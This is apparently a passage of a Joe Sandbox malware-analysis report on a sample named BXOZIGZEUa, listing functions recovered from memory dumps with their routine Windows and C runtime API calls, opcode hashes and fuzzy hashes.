Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: ActivationContextH_prolog3Release
String ID:
API String ID: 1979592854-0
Opcode ID: ca1420dbc2616af2bded350056c8a5a9da011c2548133d7225add658d22e04fe
Instruction ID: d8c770f5c845197b24198720a832c1baa9e80572483c08b5fbce27e913121252
Opcode Fuzzy Hash: ca1420dbc2616af2bded350056c8a5a9da011c2548133d7225add658d22e04fe
Instruction Fuzzy Hash: 46214538201A41DFDB28DF79C498E2AB7F1BF99714714466DE1A3CB6A0CB30E802DB10

Function 001CA2C5 Relevance: 3.0, APIs: 2, Instructions: 36COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000000,?,?,001C106C,00000000), ref: 001CA2D3
SetErrorMode.KERNELBASE(00000000,?,?,001C106C,00000000), ref: 001CA2DB

Part of subcall function 001CF00F: GetModuleFileNameW.KERNEL32(?,?,00000105,?,?), ref: 001CF042
Part of subcall function 001CF00F: SetLastError.KERNEL32(0000006F,?,?), ref: 001CF059

Part of subcall function 001CA0E9: GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,00000000), ref: 001CA126
Part of subcall function 001CA0E9: PathFindExtensionW.SHLWAPI(?,?,?,00000000), ref: 001CA140
Part of subcall function 001CA0E9: __wcsdup.LIBCMT ref: 001CA18A
Part of subcall function 001CA0E9: __wcsdup.LIBCMT ref: 001CA1C8
Part of subcall function 001CA0E9: __wcsdup.LIBCMT ref: 001CA1FC

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Error__wcsdup$FileModeModuleName$ExtensionFindLastPath
String ID:
API String ID: 972848482-0
Opcode ID: a64b27df9075d4e8ae21c197c9df88582bbee8ae5cb813882caafc36216f953d
Instruction ID: 307f7be96e5eb2275601b7513a9d594b1fc7bacb5e4745efc6d10e014bf33982
Opcode Fuzzy Hash: a64b27df9075d4e8ae21c197c9df88582bbee8ae5cb813882caafc36216f953d
Instruction Fuzzy Hash: ACF06D71A102984FCB51EFA4D405F5D3B9AAF64754F05806EF5488B263DB34DC11CBA6

Function 002BE05B Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 002BE629: __getptd_noexit.LIBCMT ref: 002BE629

__lock_file.LIBCMT ref: 002BE0A2

Part of subcall function 002BD549: __lock.LIBCMT ref: 002BD56E

__fclose_nolock.LIBCMT ref: 002BE0AD

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 9cab06e92c1f7f943ffd49e3354f352814fce58201dd10a4e74877e83f4cd303
Instruction ID: e323c23ab23ddc4fd3cc1144f6330f18f28d7200418207acbd9af9ef5a6a8bcc
Opcode Fuzzy Hash: 9cab06e92c1f7f943ffd49e3354f352814fce58201dd10a4e74877e83f4cd303
Instruction Fuzzy Hash: 2BF09030834719DADB10BB79D902BEF7BA06F103B4F218B08E435BA1D1C7B89A219F55

Function 001D0431 Relevance: 3.0, APIs: 2, Instructions: 27COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001D0438
GetWindowDC.USER32(00000000,00000004,001CE19D,00000000,?,?,002F5254), ref: 001D0464

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3Window
String ID:
API String ID: 616115145-0
Opcode ID: b031f460bcfb89cc41b5f7fffe418da09abaf4ce3c89bae6dae2aaa11f4a1c4a
Instruction ID: 9a7e1613b4e7741785e8588bd9d882bc8f92cf6122827512b89f417bf3c0da27
Opcode Fuzzy Hash: b031f460bcfb89cc41b5f7fffe418da09abaf4ce3c89bae6dae2aaa11f4a1c4a
Instruction Fuzzy Hash: B5F01CB0A107158FCF61EF79C400B5EBAE4BF18700B10882EA59ACB741EB30D950CB95

Function 001C94E4 Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

ActivateActCtx.KERNEL32(?,?,0031BB48,00000010,001C95B9,KERNEL32.DLL), ref: 001C9504
LoadLibraryW.KERNELBASE(?), ref: 001C951B

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: ActivateLibraryLoad
String ID:
API String ID: 389599620-0
Opcode ID: 9b9a332b9100badb10c45d56a1d259a4efaf62bfd136380ba903fc58fd98741f
Instruction ID: d73397baab20c509bfdc59d327a0a13ef530c5723fa93d555f1623f47dfbda04
Opcode Fuzzy Hash: 9b9a332b9100badb10c45d56a1d259a4efaf62bfd136380ba903fc58fd98741f
Instruction Fuzzy Hash: 13F08CB1C10218EBCF01AFA4DC09ADEBB70BB18B40F40446AF055A6190CB74C502DF80

Function 002BEB8B Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCorExitProcess.LIBCMT ref: 002BEB93

Part of subcall function 002BEB60: GetModuleHandleW.KERNEL32(mscoree.dll,?,002BEB98,?,?,002BE4E0,000000FF,0000001E,00000001,00000000,00000000,?,002C4298,?,00000001,?), ref: 002BEB6A
Part of subcall function 002BEB60: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 002BEB7A

ExitProcess.KERNEL32 ref: 002BEB9C

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 0e1818a0e10278377ee08b809d99a73ad40405f273aaa9d160dab1944ffb6ee8
Instruction ID: df296b1d82940b7fc1db422fede98ef4bd3586a2bc5477308b9e9f97e78f1b80
Opcode Fuzzy Hash: 0e1818a0e10278377ee08b809d99a73ad40405f273aaa9d160dab1944ffb6ee8
Instruction Fuzzy Hash: 9CB0923140018CBFCF112F23ED0EC897F2AEB807A0B114020F90A09031DF72EDA29A88

Function 001C8A90 Relevance: 1.6, APIs: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 001C8ADE

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: _memcpy_s
String ID:
API String ID: 2001391462-0
Opcode ID: 360983abc963d180cc33d66c654b976c084fbdc2e506759bc210f0887cbecbba
Instruction ID: 707b031b93cdbd7e2a88d26fb8e3078ba5d4962b0ba231a8227d76aa8e95de1e
Opcode Fuzzy Hash: 360983abc963d180cc33d66c654b976c084fbdc2e506759bc210f0887cbecbba
Instruction Fuzzy Hash: 4F116D76600A04AFC309DF58C881DAAB3A9FF99310715865EE5198B351EB31ED01CBD0

Function 001D1632 Relevance: 1.5, APIs: 1, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001D1639

Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3$Exception@8Throw
String ID:
API String ID: 2489616738-0
Opcode ID: 724dbca499fb502eb7e1729cfd44456eff0f191d1e2c5d9b60cfecba4c84da80
Instruction ID: ab49b08318ab1c6d5dee35a86e1075c042fdb0dd08f8032699d025b968cb248b
Opcode Fuzzy Hash: 724dbca499fb502eb7e1729cfd44456eff0f191d1e2c5d9b60cfecba4c84da80
Instruction Fuzzy Hash: BB018F74600202FBDF26AF25C852B7D36A6BF60361F19412EE8918B391EF74CD50DB54

Function 001C8780 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

FindResourceW.KERNELBASE(?,?,00000006,00000104,001CA1B8,?,001CADE8,?,?,?,00000000,?,001CA1B8,0000E000,?,00000100), ref: 001C8798

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: FindResource
String ID:
API String ID: 1635176832-0
Opcode ID: 83805f69686c83fb041de033db40d747fc3231e157fa4dcb7b17fc8432099a3b
Instruction ID: b27f2ee33097bddf61b41bf0f318e407aece2f714742c028300f1255672bcca7
Opcode Fuzzy Hash: 83805f69686c83fb041de033db40d747fc3231e157fa4dcb7b17fc8432099a3b
Instruction Fuzzy Hash: A6E0CD2630011437D510154EBC85EFB775CCBD16B6B00403BFD4DDB140E661EC1151F0

Function 001CAF3A Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 001CAF59

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: _malloc
String ID:
API String ID: 1579825452-0
Opcode ID: fe189ec788af057dcd4b1ff232a28fefe3e0e8550917db351e345314bec743c0
Instruction ID: 68b4eef22eaf2a222ec60ec763cb783524c252eeb81ae5fd53f2474f4f632717
Opcode Fuzzy Hash: fe189ec788af057dcd4b1ff232a28fefe3e0e8550917db351e345314bec743c0
Instruction Fuzzy Hash: 9FE0927351061A6BC7019F59D404F8AFBECDFA1374F56C46EE804CB252C7B1E8048BA0

Function 001CB3BB Relevance: 1.5, APIs: 1, Instructions: 25fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNELBASE(?,?,?,00000000,001C1C42,?,00000000,*.*,00000003,?,00000001,6B722804,?,?,00000000), ref: 001CB3EF

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: cdac9f415dab30637706e40cc3b2b74fe6c964bd65d8ea884bf5534d602bf8fa
Instruction ID: eb088e0dabe7db4c2963a80aab4e108c2edda15d4b3a3fd0fb3b2cfe80a2f495
Opcode Fuzzy Hash: cdac9f415dab30637706e40cc3b2b74fe6c964bd65d8ea884bf5534d602bf8fa
Instruction Fuzzy Hash: 0DE0ED31504B50DFDB609B69F984B53B7E4EB98B21F11C82EE4AEC3A54D770E8408A10

Function 001CD0A7 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

Part of subcall function 001DE769: GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 001DE79C
Part of subcall function 001DE769: _memset.LIBCMT ref: 001DE7B5

SystemParametersInfoW.USER32(00000029,?,?,00000000), ref: 001CD0C8

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: AddressInfoParametersProcSystem_memset
String ID:
API String ID: 831922234-0
Opcode ID: 747fc92d01f7a6b2dec8e9b6e1a6fb956c4811eea979f7a5b887e964bfb01bcc
Instruction ID: 5f8fa48cbf69a6d05bac001ce148db6a0ee69627127bccec96dc39d5a3698f7b
Opcode Fuzzy Hash: 747fc92d01f7a6b2dec8e9b6e1a6fb956c4811eea979f7a5b887e964bfb01bcc
Instruction Fuzzy Hash: CCD013711803046FD7515B44DC45F663B59D794715F500425F90D9F151CBB6EC50C656

Function 001D0636 Relevance: 1.5, APIs: 1, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 001D0645

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: DeleteObject
String ID:
API String ID: 1531683806-0
Opcode ID: 00e9eceb773ac39765e8e81376fee46a10102ad7475b39642ce287fa4bd7f41e
Instruction ID: 7027a8267adda89ef882e0a354609c24fa9c64b45ec692b88046d0e5d1609330
Opcode Fuzzy Hash: 00e9eceb773ac39765e8e81376fee46a10102ad7475b39642ce287fa4bd7f41e
Instruction Fuzzy Hash: EAB01270C46110EEDF01A730DD4C31636647BE4307F1488D9F009CA101DF79C012C554

Non-executed Functions

Function 0020CF37 Relevance: 53.5, APIs: 28, Strings: 2, Instructions: 1017windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 0020CF6A
IsWindow.USER32(?), ref: 0020CF7F
MonitorFromPoint.USER32(?,?,00000002), ref: 0020CFF0
GetMonitorInfoW.USER32(00000000), ref: 0020CFF7
CopyRect.USER32(?,?), ref: 0020D009
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0020D019
GetSystemMetrics.USER32(00000033), ref: 0020D19D
GetSystemMetrics.USER32(00000006), ref: 0020D1A3
SendMessageW.USER32(?,00000401,00000001,00000000), ref: 0020D228
SendMessageW.USER32(?,00000418,00000000,FFFFFFFF), ref: 0020D242
SetRectEmpty.USER32(?), ref: 0020D4A5
RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0020D50E
GetWindowRect.USER32(?,?), ref: 0020D5F1
ClientToScreen.USER32(?,?), ref: 0020D83C
ClientToScreen.USER32(?,?), ref: 0020D863
ClientToScreen.USER32(?,?), ref: 0020D9FC
ClientToScreen.USER32(?,?), ref: 0020DA24
GetSystemMetrics.USER32(00000002), ref: 0020DABF
IsRectEmpty.USER32(?), ref: 0020DACF
GetSystemMetrics.USER32(00000002), ref: 0020DADB
GetWindowRect.USER32(?,?), ref: 0020DBDB
IntersectRect.USER32(?,?,-00000054), ref: 0020DC3C
InvalidateRect.USER32(?,-00000054,00000001), ref: 0020DC51
UpdateWindow.USER32(?), ref: 0020DC5A
IntersectRect.USER32(?,?,-00000054), ref: 0020DCA3
InvalidateRect.USER32(?,-00000054,00000001), ref: 0020DCB8
UpdateWindow.USER32(?), ref: 0020DCC1
RedrawWindow.USER32(?,00000000,00000000,00000105,00000000,?,?,?,?,00000014,00000000), ref: 0020DCFF

Strings

(, xrefs: 0020CFE6
(/, xrefs: 0020D36E

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Window$System$ClientMetricsScreen$EmptyInfoIntersectInvalidateMessageMonitorRedrawSendUpdate$CopyFromParametersPoint
String ID: ($(/
API String ID: 840757265-698097623
Opcode ID: b14155a99561267887fd13dd4720f4bb1a805b84e44eea7acbde0038ac9d95ba
Instruction ID: c670d1886a15d86d7790f555d03b8d1a6bd5d0c5d75a63e7ad01e32449bbe949
Opcode Fuzzy Hash: b14155a99561267887fd13dd4720f4bb1a805b84e44eea7acbde0038ac9d95ba
Instruction Fuzzy Hash: 8FA22B71A11219CFCF15CFA8C984BEDB7B5BF48304F1841BAE849AB296DB70A951CF50

Function 00213A3E Relevance: 42.5, APIs: 28, Instructions: 452windowkeyboardCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00213A73
GetWindowRect.USER32(?,?), ref: 00213A96
PtInRect.USER32(?,?,?), ref: 00213AA4

Part of subcall function 00220419: RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00220490

GetAsyncKeyState.USER32(00000012), ref: 00213AC9
ScreenToClient.USER32(?,?), ref: 00213B17
IsWindow.USER32(?), ref: 00213B5E
IsWindow.USER32(?), ref: 00213BA1
GetWindowRect.USER32(?,?), ref: 00213BC1
PtInRect.USER32(?,?,?), ref: 00213BD1
SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00213C06
PtInRect.USER32(-00000054,?,?), ref: 00213C51
SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00213C76
ScreenToClient.USER32(?,?), ref: 00213CCE
PtInRect.USER32(?,?,?), ref: 00213CDE
GetParent.USER32(?), ref: 00213D68
SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00213DFB
GetFocus.USER32 ref: 00213E01
WindowFromPoint.USER32(?,?,00000000), ref: 00213E39
SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00213E83
GetSystemMenu.USER32(?,00000000,?,?,7608A000,?), ref: 00213F0C
IsMenu.USER32(?), ref: 00213F2E
EnableMenuItem.USER32(?,0000F030,00000000), ref: 00213F4B
EnableMenuItem.USER32(?,0000F120,00000000), ref: 00213F56
IsZoomed.USER32(?), ref: 00213F64
IsIconic.USER32(?), ref: 00213F83
EnableMenuItem.USER32(?,0000F120,00000003), ref: 00213F97
TrackPopupMenu.USER32(?,00000100,?,?,00000000,?,00000000), ref: 00213FBF
SendMessageW.USER32(?,00000112,00000000,00000000), ref: 00213FD9

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$MenuRect$MessageSend$EnableItem$ClientScreen$AsyncFocusFromIconicParentPointPopupRedrawStateSystemTrackVisibleZoomed
String ID:
API String ID: 3398603409-0
Opcode ID: 6e209e865248eafcd8a4c5568b72a63cc8f765b9c44ec34d45a7525fcc2c667b
Instruction ID: 320ca14612a02063e8e17d516bdb431fece51bed058b0ba1e89b51c194d1266b
